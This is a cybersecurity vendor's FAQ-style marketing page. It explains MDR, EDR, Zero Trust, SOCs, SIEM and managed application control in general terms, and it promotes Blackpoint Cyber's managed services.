What is MDR?
MDR is a cybersecurity service that combines advanced threat detection with human expertise to provide real-time monitoring, threat hunting, and incident response capabilities. The primary goal of MDR is to help organizations promptly detect and respond to cyberthreats.
When you hear ‘MDR,’ think:
- 24/7/365 monitoring of your business’ IT network(s) and user accounts by experienced security analysts.
- Immediate, active response before threat actors can spread further into your network.
- A significant reduction in time spent responding to alerts and handling false positives.
- A fully managed, agile security service built to rapidly detect and stop cyberthreats.
Why do I need MDR?
Cybersecurity is now a critical requirement for any business using IT technology. Unfortunately, most businesses struggle to hire, train, and retain top cybersecurity staff. In addition, many off-the-shelf cybersecurity products require human management and monitoring and often generate many false alarms. Finally, threat actors are constantly evolving their tactics and technology to target IT infrastructure and users to identify weaknesses.
According to Gartner Predicts 2023, in two years, the lack of cybersecurity talent will lead to worse outcomes in over half of significant cyber incidents. To offset the skill gap and staffing shortage, businesses need 24/7 MDR to secure their company and complement any existing internal security efforts.
What is Endpoint Detection and Response (EDR)?
EDR is a cybersecurity technology that focuses on automatically detecting and responding to security incidents on endpoints, such as desktops, laptops, servers, and mobile devices. It focuses on detecting malicious software, or malware, by comparing files and applications to bad antivirus (AV) definitions and/or using machine learning to detect suspicious or malicious behavior of an application or file.
While EDRs, along with AV products, provide basic malware detection, they often fail to detect pre-threat activity as well as advanced techniques used by threat actors to evade companies’ cybersecurity efforts. For example, threat actors have learned to leverage standard, trusted IT administration tools and services prevalent in modern IT systems to carry out attacks. In these scenarios, EDRs typically fail to detect the threat, as they cannot distinguish malicious versus benign use of these trusted and authorized tools and services.
Fully automated solutions, like EDR, are no longer sufficient to stop cyberthreats. Our own data demonstrates that they consistently miss innovative and sophisticated techniques, especially when threat actors use trusted tools, approved workflows, or live-off-the-land techniques.
What is Zero Trust?
Zero Trust is a cybersecurity approach that emphasizes the principle of “never trust, always verify” when it comes to granting users or devices access to resources and systems. Most cybersecurity products that provide Zero Trust capabilities require tuning and management of allow or block lists. While this technology sounds promising by not letting anything other than “good” things occur, it, unfortunately, has shortcomings as a cybersecurity solution. Issues with Zero Trust technologies include:
- The constant micromanagement, monitoring, and validation of “good” users or devices is cumbersome.
- Legitimate uses may be denied access, leading to slow operations and decreased productivity.
- With Zero Trust technologies that block software applications, many businesses struggle to identify and maintain an accurate list of applications to block.
- As a result, many organizations that initially implement Zero Trust solutions disable or turn off important security capabilities because the impact on standard business operations is unacceptable. A more effective implementation of Zero Trust should include a curated block list (ideally one managed by an organization that is monitoring and tracking new things to block), allow for device exceptions, and be backed by a 24/7 Security Operations Center (SOC) team.
What is a SOC?
A SOC is a team of IT security professionals that monitors an organization’s entire IT infrastructure, 24/7. SOCs are focused on using telemetry (data from IT infrastructure and security platforms) collected from across an organization’s IT infrastructure and cybersecurity platforms to detect and respond to cybersecurity incidents.
Should my small- or medium-sized business (SMB) hire an outsourced SOC?
According to Verizon’s Data Breach Investigations Report 2023, “SMBs and large corporations are using similar services and infrastructure and that means their attack surfaces share more in common than ever before.” Threat actors no longer go after a business based on size alone. Widespread attacks, including the abuse of trusted IT tools, expand the attack surface. Many SMBs believe they are too small or too unknown to warrant the attention of threat actors. However, data shows that SMBs are frequently targeted by threat actors because they often have insufficient security controls, making them easier targets and resulting in more success for the threat actors with less effort. Unfortunately, these attacks occur daily to SMBs, but they seldom make news headlines.
Ultimately, Managed Service Providers (MSPs) often find it challenging to build and staff their own SOC. Increasingly, MSPs are turning to a dedicated MDR provider like Blackpoint Cyber for critical security tools and response services to keep their company secure.
What should I look for in a SOC?
- 24/7/365 monitoring by experienced security analysts
- Active threat response with industry-leading response times
- Incident recovery support
- Incident management
- Post-incident remediation guidance
- Dedicated threat intelligence staff or processes
- Capability to monitor and safeguard your specific IT services and platforms
How expensive is it to operate a SOC?
Most businesses, regardless of size, are incapable of building and running their own truly effective 24/7/365 SOC due to cost, technical complexity, and staffing challenges. Specifically, for most businesses, it is not cost-effective to operate their own SOC especially when compared to the numerous advantages of an outsourced SOC.
What is SOC as a service (SOCaaS)?
SOCaaS is an evolution in how businesses buy, interact, and manage an outsourced SOC program. Unlike traditional outsourced SOCs, which might require long-term contracts, full upfront payment, and limited customization or management of the service, SOCaaS offerings typically follow a subscription-based model, offering cloud-based service management and may provide self-service customization offerings, report access, and real-time visibility into SOC operations.
What’s Managed Application Control?
Threat actors often evade endpoint protection systems by “living off the land”–misusing legitimate IT tools native to the target environment. Managed Application Control protects from these attacks with a uniquely curated, constantly updated block list of applications by Blackpoint’s threat intelligence team. Additionally, organizations can still create custom rules and allow exceptions. The approach contrasts with pure Zero Trust or deny-all methods of application control, which produce operational bottlenecks. With Managed Application Control, IT administrators can reduce time spent on allowlists and endless verification requests.
What best practices should be included in my cybersecurity stack?
Your security stack should cover the five main pillars of defense and resiliency:
- Asset visibility
- System hardening
- Threat detection
- Real-time response
- Incident recovery
More specifically, your stack should include:
- Practice basic cyber hygiene, including practices such as:
- Multifactor authentication (MFA),
- Strong password policies, and
- The principle of least privilege.
- Maintain an active cybersecurity awareness and training program to keep yourself and your staff up to date on the latest indicators of compromise (IoCs) and how to act accordingly.
- Implement security services that provide fully managed and continuous response for on-premises and cloud environments.
- This service should provide protection against current and emerging cyberattack tactics, including lateral spread, the abuse of legitimate IT tools, account impersonation, etc., and can effectively respond to these attacks in a timely manner, especially fast-moving ransomware attacks.
- Implement strict application management that is frequently updated with current threat intelligence.
- Establish a backup and recovery program, including offsite backups that cannot be compromised themselves in a standard attack.
- Conduct regular risk assessments and address high-risk findings.
- Adhere to government and industry best practices and compliance requirements.
- Execute a patch management program.
- Ongoing visibility into internal, external, and cloud environments.
- Maintain an up-to-date Incident Response Plan (IRP).
- Maintain an accurate inventory of equipment, infrastructure, and user accounts, including IoT (Internet of Things) devices.
How do I protect my data in the cloud?
The workplace’s transition to cloud platforms has extended and altered threat actors’ attack surfaces. Partner with a cloud security vendor that provides:
- Continuous monitoring, real-time detection, active response,
- The ability to stop zero-day attacks (attack tactics never seen before),
- The ability to stop account compromise, business email compromise (BEC), data exfiltration, and more.
If I already use Microsoft Defender for Business or Microsoft 365 Business Premium to run and secure my business, do I need other services?
For the MSP community, cloud security can be one of the most challenging areas of cybersecurity, with many utilizing a Microsoft environment to run their business. To help MSPs better serve their clients, Blackpoint offers multiple solutions to provide further support for those services.
- Cloud Response: MDR-powered cloud monitoring and response for Microsoft 365, including Microsoft 365 Business Premium
- Managed EDR: Full-service response by our SOC team to EDR alerts for Microsoft Defender for Endpoint and Defender for Business
- Managed Defender for Endpoint: Fully managed version of Microsoft Defender for Endpoint, where you can easily control and apply policies to multiple customers at once
- Vulnerability Management’s Internal Scan: Understand the security of your clients’ Microsoft 365 presence, including their Microsoft Secure Score, through Microsoft Defender for Endpoint
- Vulnerability Management’s Cloud Scan: Easily view how your cloud security measures stack up to CIS Microsoft 365 Foundations Benchmarks
What is a SIEM?
A SIEM (security information and event management) platform collects event and log data generated by the organization’s technology infrastructure, audit systems, and cybersecurity technologies. While it can help with discovering IT operational events and storing substantial amounts of data for investigations and exercises, it has some pitfalls:
- It can be extremely expensive, especially to implement well,
- Must receive significant amounts of data to offer much utility, which further increases costs,
- Usually takes weeks or months to fully implement,
- Often overwhelms security teams with unnecessary data and alerts,
- Requires expert users with knowledge of complex data query languages,
- Is slow at detecting active/real-time cyberthreats, and
- Requires additional third-party tools for any response capability.
Do I need any security solutions other than my backup?
While up-to-date backups are a critical component of an effective cybersecurity program, they are not a silver bullet. Relying on backups as your primary cybersecurity strategy is a high-risk decision that does not protect your business as it will not:
- Stop an attack from happening in the first place,
- Prevent the theft of sensitive data; the failure to protect this data could result in compliance violations and legal suits,
- Allow full recovery as threat actors may also target, corrupt, or destroy your backups as part of the attack,
- Prevent reputational damage to your customers and business, nor
- Prevent interruptions to business operations.
Should I consolidate my security stack with one vendor?
Cybersecurity service providers that offer an ecosystem of integrated solutions often provide more effective security at the same or lower cost than a strategy that relies on multiple point solutions from different vendors. When evaluating managed security services, consider one that has a robust ecosystem of products and services. Such service providers may offer the following benefits:
- Technology solutions that work well together, are efficient, and allow for expansion,
- Consistent service experience and expectations,
- Consolidated billing, unaffected by other companies, along with bundled pricing,
- Faster onboarding and implementation of security capabilities,
- Unified reporting and alert/event management,
- Holistic security view of your assets,
- Faster threat detection due to integrated products, and
- Rapid creation of new threat detection capabilities.
Why choose Blackpoint Cyber?
At Blackpoint, we fuse real security and real response. Founded in 2014 by former National Security Agency (NSA) cyber operations experts, we have built an innovative and streamlined cyber ecosystem to protect each of you and your customers’ endpoints from advanced threat actors. Powered by our proprietary MDR technology, we combine network visualization, tradecraft detection, and endpoint security, suspicious events, and remote privileged activity, our elite SOC team neutralizes cyberthreats faster than any other solution on the market. These efforts are further supported by our Zero Trust mentality, alignment to industry standard best practices, and unmatched, in-house threat intelligence team to keep us all one step ahead of our adversaries. Together, your MSP’s security stack can be proof that you employ superior security and best practices, keeping your community’s companies secure.
Learn how Blackpoint Cyber is protecting hundreds of businesses just like yours. Book a demo today!